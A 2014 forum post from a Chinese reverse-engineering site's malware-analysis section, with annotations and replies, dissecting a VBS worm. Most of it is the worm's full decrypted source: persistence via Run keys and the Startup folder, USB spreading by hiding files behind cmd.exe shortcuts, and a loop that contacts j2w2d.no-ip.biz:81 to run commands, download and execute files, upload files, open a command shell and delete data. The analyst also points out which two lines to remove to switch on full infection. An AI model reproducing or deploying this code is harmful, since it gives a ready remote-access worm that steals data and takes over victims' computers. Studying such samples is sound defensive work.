吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 11454|回复: 12
收起左侧

[PC样本分析] 一个VBS脚本病毒的简单分析

  [复制链接]
null119 发表于 2014-1-13 05:46
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 null119 于 2014-3-18 00:52 编辑

原贴地址http://www.52pojie.cn/thread-231937-1-1.html

病毒脚本行为简单描述:
运行后,复制自身到系统"%appdata%" 目录或"%temp%"目录下,设置为隐藏+系统文件属性,写注册表,添加开机自启动,然后监视可移动磁盘,有新可移动磁盘接入后,复制病毒脚本文件到可移动磁盘根目录,加隐藏+系统属性,然后遍历可移动磁盘中的所有文件及子文件夹,将除.lnk之外的所有文件及所有子文件夹全部设置为隐藏+系统属性,然后为这些文件或文件夹创建快捷方式,但快捷方式的目标参数除了打开文件本身之外,同时还会运行病毒脚本文件,以最常见的desktop.ini 文件为例,病毒脚本为其创建的快捷方式,其目标参数为:C:\Windows\system32\cmd.exe /c start 1.vbs&start desktop.ini&exit,再接着向服务器"j2w2d.no-ip.biz"的81端口,发送消息,然后根据服务器返回消息执行病毒脚本的升级,和实现下载未知文件等等功能,以上所有动作间隔5秒重复执行,而解决方法,脚本当中自带uninstall过程!

最后说明一下,此脚本目前还仅仅只是向可移动磁盘复制病毒脚本本体,因为在感染代码的'install'过程 当中有两句if not lnkfile then exit for if not lnkfolder then exit for ,不过此病毒可通过网络途径自行升级,所以可能只是病毒作者还没完全做好一些准备,只要这两句代码一注释,那么,大家懂的!

以上所有仅为个人所见,如有说明不当之处,还请多多包涵!

解密脚本+简单分析标注如下,大致的东西都知道得差不多了,所以后面的一些过程也没加注释了,有功夫的慢慢看吧:

[Visual Basic] 纯文本查看 复制代码
'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "j2w2d.no-ip.biz"
port = 81
installdir = "%appdata%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname  
'当前脚本名称(也就是脚本的文件名)
startup = shellobj.specialfolders ("startup") & "\" 
'上面这句是获取开始菜单-程序文件夹的路径,再拼接上startup,即为开始菜单-程序-启动文件夹,WIN7系统为C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
’从环境变量中返回%appdata%文件夹,WIN7系统为C:\Users\Administrator\AppData\Roaming\
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
’如果不存在%appdata%文件夹,则切换为%temp% windows临时文件夹
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
'调用instance过程,作用为读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值,如果该键不存在,则写入,根键值则根据情况写入 "true - " & date 或  "false - " & date


while true
'循环体

install
'install过程就是查找连接到计算机并已经准备好的可移动磁盘,复制病毒脚本文件到该可移动磁盘中,并设置为隐藏+系统文件属性,然后将所有正常文件和子文件夹也都设置为系统+隐藏属性,并为所有正常文件和子文件夹创建快捷方式,目标参数在指向正常文件的同时指向病毒脚本

response = ""
response = post ("is-ready","")
'向网络服务器发送数据
cmd = split (response,spliter)
select case cmd (0)
'判断服务器返回参数
case "excecute"
'返回的第一个参数为"excecute" 则执行服务器返回的第二个参数 
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      '以只写方式打开病毒脚本文件
      oneonce.write param
      '写入服务器返回的第一个参数
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      '不显示批处理错误及提示信息运行病毒脚本文件
      wscript.quit 
case "uninstall"
'返回的第一个参数为"uninstall"时,执行install过程的逆过程
      uninstall
case "send"
'返回的第一个参数为"send"时,下载并运行返回的第二个参数文件和第三个参数文件
      download cmd (1),cmd (2)
case "site-send"
'返回的第一个参数为"site-send"时,下载并运行返回的第二个参数文件和第三个参数文件
      sitedownloader cmd (1),cmd (2)
case "recv"
'返回的第一个参数为"recv"时,通过网络升级病毒脚本文件,即返回的第二个参数文件
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
'返回的第一个参数为"delete"时,删除文件及文件夹
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
'返回的第一个参数为"exit-process"时,结束pid=param的进程
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
'upstart这个过程作用就是写注册表,将脚本加入开机启动,并复制脚本文件到%appdata%或%temp%文件夹

'下面这一大段就是感染代码了

for each drive in filesystemobj.drives
'遍历所有驱动器
if  drive.isready = true then
'当插入移动磁盘准备接受访问时,IsReady才返回 True,可理解为当插入移动磁盘,并且系统已准备好进行读写,则执行下面代码
if  drive.freespace  > 0 then
'返回驱动器可用空间值,如果大于0则
if  drive.drivetype  = 1 then
'返回驱动器的类型,如果是可移动磁盘则
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    '复制脚本文件到可移动磁盘根目录
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
    '如果在可移动磁盘根目录存在这个脚本文件则
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
        '设置可移动磁盘根目录的病毒脚本文件属性为隐藏+系统文件
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
    '遍历可移动磁盘目录下的所有文件
        if not lnkfile then exit for
        '如果文件不是lnkfile 则退出循环
        if  instr (file.name,".") then
        '如果文件名中存在"."这个字符串,则
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
            '如果文件后缀后不等于"lnk",则
                file.attributes = 2+4
                '设置文件属性为隐藏+系统文件
                if  ucase (file.name) <> ucase (installname) then
                ’如果文件名不等于病毒脚本文件名则
                    filename = split(file.name,".")
                    'filename(0)=文件名
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                    '在可移动磁盘根目录下创建该文件的快捷方式 
                    lnkobj.windowstyle = 7
                    '设置为快捷方式使用的的窗口样式类型
                    lnkobj.targetpath = "cmd.exe"
                    '设置快捷方式的可执行文件的路径
                    lnkobj.workingdirectory = ""
                    '为快捷方式指派工作目录
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    '设置快捷方式目标参数,该参数除了指向正常文件本身,同时还指向病毒脚本
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    '读取注册表中该文件的图标样式并根据情况设置该快捷方式的图标
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                    '保存快捷方式
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
    '遍历可移动磁盘中所有子文件夹
        if not lnkfolder then exit for
        folder.attributes = 2+4
        '设置文件夹属性为隐藏+系统文件夹
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
        '为子文件夹创建快捷方式,下面代码跟上面都一样 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
'install过程的逆过程
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)
'向网络服务器发送数据
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
'上面两句是写注册表,将脚本加入开机启动
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
'复制脚本文本到%appdata%或%temp%文件夹
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
'复制脚本文本到开始菜单-程序-启动文件夹

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
         osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
'读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值
if usbspreading = "" then
'如果不存在这个该键,则
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
'wscript.scriptfullname=当前脚本运行的完整路径,mid 取脚本完整路径的第二个字符到最后一个字符,如果这个前面获取的字符串等于":\"&lcase(installname),则执行下面两行代码,否则执行Else下面两行代码
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
'写注册表中usbspreading的这个键值,内容为 "true - " & date   (date为系统日期)
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)
'还是下载文件,参数为(下载文件URL,下载后保存的文件名)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
                .type = 1 
                .open
                .write objhttpdownload.responsebody
                .savetofile strsaveto
                .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)
'下载文件函数(参数为下载文件URL,下载文件保存目录)
if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
        set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
                 .type = 1 
                 .open
                 .write objhttpdownload.responsebody
                 .savetofile strsaveto
                 .close
        end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
         .loadfromfile fileurl
         buffer = .read
         .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
        enumprocess = enumprocess & objitem.name & "|"
        enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

免费评分

参与人数 2热心值 +2 收起 理由
九零-鑫鑫 + 1 我很赞同!
夜的静night + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

头像被屏蔽
夜的静night 发表于 2014-1-13 09:02
提示: 作者被禁止或删除 内容自动屏蔽
hsznlhd 发表于 2014-1-13 09:19
Sreac.L 发表于 2014-1-13 09:26
lzxlozt 发表于 2014-1-13 09:27
先收藏了,再慢慢学习
小宇0721 发表于 2014-1-13 09:30
幸苦了。。
九零-鑫鑫 发表于 2014-1-13 09:41
代码写的很清楚 不过vsb没学过 但是能看明白
 楼主| null119 发表于 2014-1-13 20:34
Sreac.L 发表于 2014-1-13 09:26
膜拜大神

小菜一个,不足挂齿
Hmily 发表于 2014-3-16 17:24
移动下,原帖地址贴的有问题,这个是自己帖子的连接,给下具体帖子地址看看。
lovewusheng 发表于 2014-3-16 20:09
膜拜,继续学习
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2023-1-31 02:42

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表